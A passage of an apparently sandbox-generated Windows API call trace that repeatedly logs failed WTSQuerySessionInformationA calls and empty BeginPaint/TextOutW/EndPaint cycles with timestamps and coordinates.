out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.495] WTSFreeMemory (pMemory=0x0) [0037.495] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.495] TextOutW (hdc=0x0, x=2113, y=375, lpString="", c=0) returned 1 [0037.495] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.495] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.496] WTSFreeMemory (pMemory=0x0) [0037.496] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.496] TextOutW (hdc=0x0, x=2123, y=400, lpString="", c=0) returned 1 [0037.496] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.496] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.496] WTSFreeMemory (pMemory=0x0) [0037.496] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.496] TextOutW (hdc=0x0, x=2133, y=425, lpString="", c=0) returned 1 [0037.496] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.496] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.497] WTSFreeMemory (pMemory=0x0) [0037.497] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.497] TextOutW (hdc=0x0, x=2143, y=450, lpString="", c=0) returned 1 [0037.497] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.497] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.497] WTSFreeMemory (pMemory=0x0) [0037.497] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.497] TextOutW (hdc=0x0, x=2153, y=475, lpString="", c=0) returned 1 [0037.497] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.497] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.497] WTSFreeMemory (pMemory=0x0) [0037.498] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.498] TextOutW (hdc=0x0, x=2163, y=500, lpString="", c=0) returned 1 [0037.498] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.498] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.498] WTSFreeMemory (pMemory=0x0) [0037.498] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.498] TextOutW (hdc=0x0, x=2173, y=525, lpString="", c=0) returned 1 [0037.498] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.498] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.498] WTSFreeMemory (pMemory=0x0) [0037.499] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.499] TextOutW (hdc=0x0, x=2183, y=550, lpString="", c=0) returned 1 [0037.499] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.499] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.499] WTSFreeMemory (pMemory=0x0) [0037.499] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.499] TextOutW (hdc=0x0, x=2193, y=575, lpString="", c=0) returned 1 [0037.499] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.499] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.499] WTSFreeMemory (pMemory=0x0) [0037.499] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.499] TextOutW (hdc=0x0, x=2203, y=600, lpString="", c=0) returned 1 [0037.500] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.500] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.500] WTSFreeMemory (pMemory=0x0) [0037.500] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.500] TextOutW (hdc=0x0, x=2213, y=625, lpString="", c=0) returned 1 [0037.500] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.500] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.500] WTSFreeMemory (pMemory=0x0) [0037.500] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.500] TextOutW (hdc=0x0, x=2223, y=650, lpString="", c=0) returned 1 [0037.500] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.500] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.501] WTSFreeMemory (pMemory=0x0) [0037.501] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.501] TextOutW (hdc=0x0, x=2233, y=675, lpString="", c=0) returned 1 [0037.501] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.501] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.501] WTSFreeMemory (pMemory=0x0) [0037.501] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.501] TextOutW (hdc=0x0, x=2243, y=700, lpString="", c=0) returned 1 [0037.501] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.501] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.502] WTSFreeMemory (pMemory=0x0) [0037.502] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.502] TextOutW (hdc=0x0, x=2253, y=725, lpString="", c=0) returned 1 [0037.502] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.502] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.502] WTSFreeMemory (pMemory=0x0) [0037.502] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.502] TextOutW (hdc=0x0, x=2263, y=750, lpString="", c=0) returned 1 [0037.502] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.502] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.503] WTSFreeMemory (pMemory=0x0) [0037.503] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.503] TextOutW (hdc=0x0, x=2273, y=775, lpString="", c=0) returned 1 [0037.503] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.503] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.503] WTSFreeMemory (pMemory=0x0) [0037.503] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.503] TextOutW (hdc=0x0, x=2283, y=800, lpString="", c=0) returned 1 [0037.503] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.503] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.503] WTSFreeMemory (pMemory=0x0) [0037.504] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.504] TextOutW (hdc=0x0, x=2293, y=825, lpString="", c=0) returned 1 [0037.504] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.504] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.504] WTSFreeMemory (pMemory=0x0) [0037.504] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.504] TextOutW (hdc=0x0, x=2303, y=850, lpString="", c=0) returned 1 [0037.504] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.504] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.504] WTSFreeMemory (pMemory=0x0) [0037.504] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.504] TextOutW (hdc=0x0, x=2313, y=875, lpString="", c=0) returned 1 [0037.505] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.505] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.505] WTSFreeMemory (pMemory=0x0) [0037.505] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.505] TextOutW (hdc=0x0, x=2323, y=900, lpString="", c=0) returned 1 [0037.505] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.505] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.505] WTSFreeMemory (pMemory=0x0) [0037.505] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.505] TextOutW (hdc=0x0, x=2333, y=925, lpString="", c=0) returned 1 [0037.505] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.505] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.506] WTSFreeMemory (pMemory=0x0) [0037.506] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.506] TextOutW (hdc=0x0, x=2343, y=950, lpString="", c=0) returned 1 [0037.506] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.506] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.506] WTSFreeMemory (pMemory=0x0) [0037.506] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.506] TextOutW (hdc=0x0, x=2353, y=975, lpString="", c=0) returned 1 [0037.506] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.506] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.507] WTSFreeMemory (pMemory=0x0) [0037.507] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.507] TextOutW (hdc=0x0, x=2363, y=1000, lpString="", c=0) returned 1 [0037.507] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.507] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.507] WTSFreeMemory (pMemory=0x0) [0037.507] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.507] TextOutW (hdc=0x0, x=2373, y=1025, lpString="", c=0) returned 1 [0037.507] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.507] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.507] WTSFreeMemory (pMemory=0x0) [0037.508] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.508] TextOutW (hdc=0x0, x=2383, y=1050, lpString="", c=0) returned 1 [0037.508] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.508] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.508] WTSFreeMemory (pMemory=0x0) [0037.508] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.508] TextOutW (hdc=0x0, x=2393, y=1075, lpString="", c=0) returned 1 [0037.508] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.508] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.508] WTSFreeMemory (pMemory=0x0) [0037.509] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.509] TextOutW (hdc=0x0, x=2403, y=1100, lpString="", c=0) returned 1 [0037.509] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.509] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.509] WTSFreeMemory (pMemory=0x0) [0037.509] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.509] TextOutW (hdc=0x0, x=2413, y=1125, lpString="", c=0) returned 1 [0037.509] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.509] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.510] WTSFreeMemory (pMemory=0x0) [0037.510] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.510] TextOutW (hdc=0x0, x=2423, y=1150, lpString="", c=0) returned 1 [0037.510] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.510] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.510] WTSFreeMemory (pMemory=0x0) [0037.510] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.510] TextOutW (hdc=0x0, x=2433, y=1175, lpString="", c=0) returned 1 [0037.510] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.510] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.511] WTSFreeMemory (pMemory=0x0) [0037.511] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.511] TextOutW (hdc=0x0, x=2443, y=1200, lpString="", c=0) returned 1 [0037.511] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.511] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.511] WTSFreeMemory (pMemory=0x0) [0037.511] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.511] TextOutW (hdc=0x0, x=2453, y=1225, lpString="", c=0) returned 1 [0037.511] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.511] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.511] WTSFreeMemory (pMemory=0x0) [0037.512] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.512] TextOutW (hdc=0x0, x=2463, y=1250, lpString="", c=0) returned 1 [0037.512] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.512] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.512] WTSFreeMemory (pMemory=0x0) [0037.512] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.512] TextOutW (hdc=0x0, x=2473, y=1275, lpString="", c=0) returned 1 [0037.512] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.512] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.512] WTSFreeMemory (pMemory=0x0) [0037.513] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.513] TextOutW (hdc=0x0, x=2483, y=1300, lpString="", c=0) returned 1 [0037.513] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.513] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.513] WTSFreeMemory (pMemory=0x0) [0037.513] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.513] TextOutW (hdc=0x0, x=2493, y=1325, lpString="", c=0) returned 1 [0037.513] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.513] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.513] WTSFreeMemory (pMemory=0x0) [0037.513] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.513] TextOutW (hdc=0x0, x=2503, y=1350, lpString="", c=0) returned 1 [0037.513] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.514] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.514] WTSFreeMemory (pMemory=0x0) [0037.514] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.514] TextOutW (hdc=0x0, x=2513, y=1375, lpString="", c=0) returned 1 [0037.514] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.514] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.514] WTSFreeMemory (pMemory=0x0) [0037.515] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.515] TextOutW (hdc=0x0, x=2523, y=1400, lpString="", c=0) returned 1 [0037.515] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.515] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.515] WTSFreeMemory (pMemory=0x0) [0037.515] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.515] TextOutW (hdc=0x0, x=2533, y=1425, lpString="", c=0) returned 1 [0037.515] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.515] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.515] WTSFreeMemory (pMemory=0x0) [0037.516] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.516] TextOutW (hdc=0x0, x=2543, y=1450, lpString="", c=0) returned 1 [0037.516] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.516] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.516] WTSFreeMemory (pMemory=0x0) [0037.516] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.516] TextOutW (hdc=0x0, x=2553, y=1475, lpString="", c=0) returned 1 [0037.516] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.516] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.516] WTSFreeMemory (pMemory=0x0) [0037.516] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.516] TextOutW (hdc=0x0, x=2563, y=1500, lpString="", c=0) returned 1 [0037.516] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.517] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.517] WTSFreeMemory (pMemory=0x0) [0037.517] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.517] TextOutW (hdc=0x0, x=2573, y=1525, lpString="", c=0) returned 1 [0037.517] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.517] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.517] WTSFreeMemory (pMemory=0x0) [0037.517] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.517] TextOutW (hdc=0x0, x=2583, y=1550, lpString="", c=0) returned 1 [0037.517] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.517] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.518] WTSFreeMemory (pMemory=0x0) [0037.518] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.518] TextOutW (hdc=0x0, x=2593, y=1575, lpString="", c=0) returned 1 [0037.518] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.518] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.518] WTSFreeMemory (pMemory=0x0) [0037.518] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.518] TextOutW (hdc=0x0, x=2603, y=1600, lpString="", c=0) returned 1 [0037.518] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.518] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.519] WTSFreeMemory (pMemory=0x0) [0037.519] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.519] TextOutW (hdc=0x0, x=2613, y=1625, lpString="", c=0) returned 1 [0037.519] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.519] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.519] WTSFreeMemory (pMemory=0x0) [0037.519] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.519] TextOutW (hdc=0x0, x=2623, y=1650, lpString="", c=0) returned 1 [0037.519] EndPaint 